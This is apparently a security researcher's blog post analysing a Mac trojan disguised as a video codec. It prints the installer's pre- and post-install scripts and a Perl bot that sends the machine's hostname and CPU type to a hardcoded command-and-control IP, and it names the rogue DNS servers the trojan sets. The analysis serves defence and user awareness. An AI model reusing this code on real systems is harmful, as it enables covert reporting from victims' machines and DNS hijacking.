Mac Codec Trojan

Sunbelt is reporting about a codec style trojan targeted towards Mac users.

Alex from Sunbelt was kind enough to provide several researchers (and me) with links to this trojan. It appears that depending on your user agent (either Mac or Windows) you will be served a different version of the binary. We will not be linking to the binary at this time, and I will be focused on the Mac version, since that is the one getting all the attention.

The package is titled MacCodec, and does require your administrator password to mount. The default install location is /Library/Internet Plug-Ins/ and it comes with a pretty license agreement:

SOFTWARE INSTALLATION: Components bundled with our software may report to Licensor and/or its affiliates the installation status of certain marketing offers, such as toolbars, and also generalized installation information, such as language preference and operating system version, to assist Licensor in its product development. No personal information will be communicated to Licensor or its affiliates during this process. Licensor reserves the right to install additional components through its check/update system. These components could include Toolbar, Pop-up advertising solution, Commercial homepage manager, Commercial messenger and could modify some of your network settings.

PreInstall Script:

#!/bin/bash
s1=85.255.116.156
s2=85.255.112.15
path="/Library/Internet Plug-Ins"
PSID=$( (/usr/sbin/scutil | grep PrimaryService | sed -e 's/.*PrimaryService : //')

PostInstall Script:

#!/bin/sh
path="/Library/Internet Plug-Ins/"
/usr/bin/perl "$path/sendreq"
rm -rf "$path/sendreq"

Well commented perl bot:

#!/usr/bin/perl
use IO::Socket;
sub encode_base64 ($;$)
if ($] >= 5.006) {
require bytes;
if (bytes::length($_[0]) > length($_[0]) ||
($] >= 5.008 && $_[0] =~ /[^\0-\xFF]/))
require Carp;
Carp::croak("The Base64 encoding is only defined for bytes");
}
use integer;
my $eol = $_[1];
$eol = "\n" unless defined $eol;
my $res = pack("u", $_[0]);
# Remove first character of each line, remove newlines
$res =~ s/^.//mg;
$res =~ s/\n//g;
$res =~ tr|` -_|AA-Za-z0-9+/|; # `# help emacs
# fix padding at the end
my $padding = (3 - length($_[0]) % 3) % 3;
$res =~ s/.{$padding}$/'=' x $padding/e if $padding;
# break encoded string into lines of no more than 76 characters each
if (length $eol) {
$res =~ s/(.{1,76})/$1$eol/g;
}
return $res;
my $server="85.255.121.37";
my $cmd=`uname -p;echo ";";hostname`;
$cmd=~s/\n//g;
my $uniqid=encode_base64("mac;".$cmd);
$uniqid=~s/\n//g;
my $request="GET / HTTP/1.1\r\nAccept-Language: $uniqid\r\nHost: $server\r\n\r\n";
my $socket=IO::Socket::INET->new(PeerAddr=>$server,PeerPort=>80,Proto=>"tcp",timeout=>10) or die();
print $socket $request;
close($socket);

So, this Trojan requires the user to enter their password for install - which probably wont seem suspicious to the unsuspecting user, since a lot of software requires administrator password for install. Then changes DNS entries to 85.255.116.156 and 85.255.112.15. It attempts to make contact with a http based C&C at 85.255.121.37. You might want to think twice about installing suspicious looking codecs - porn just isn't that good.

The DNS servers point every invalid query (and probably a few valid porn sites) to 216.255.187.215 which Bleeding Edge recommends you block.

As expected, this is getting all sorts of attention from ISC. Its also sparked the Mac lovers vs haters debate on several forums. It really isn't all that special, just a Perl script packed in a dmg file. PerlBots have worked on Mac for ages now. While the thought of infecting a Mac or Linux box is sexy, this is hardly news. With that said, I do like the public attention Macs are getting, with regards to security. Regardless of operating system, users should remain on guard and prepared to use their common sense at all times.